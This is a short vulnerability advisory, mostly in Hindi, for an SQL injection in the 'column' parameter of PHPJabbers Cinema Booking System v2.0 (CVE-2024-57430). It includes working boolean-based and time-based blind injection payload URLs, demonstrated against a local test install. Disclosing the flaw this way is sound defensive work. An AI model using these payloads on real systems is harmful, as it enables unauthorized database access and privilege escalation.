
CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 SQL इंजेक्शन के प्रति संवेदनशील है, जिससे अनधिकृत डेटा एक्सेस और विशेषाधिकार वृद्धि (privilege escalation) हो सकती है।
PHPJabbers Cinema Booking System v2.0 के pjActionGetUser फ़ंक्शन में एक SQL injection भेद्यता हमलावरों को column पैरामीटर के माध्यम से डेटाबेस क्वेरीज़ में हेरफेर करने की अनुमति देती है। इस दोष का शोषण करने से अनधिकृत जानकारी का खुलासा, विशेषाधिकार वृद्धि, या डेटाबेस में हेरफेर हो सकता है।
Vulnerable Parameter: column
SQL injection संवेदनशील जानकारी तक अनधिकृत पहुंच, डेटाबेस संशोधन, और यहां तक कि डेटाबेस सर्वर के पूर्ण समझौते का कारण बन सकता है। यह एप्लिकेशन की गोपनीयता, अखंडता और उपलब्धता के लिए एक गंभीर खतरा पैदा करता है।
GET अनुरोध URL पर: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10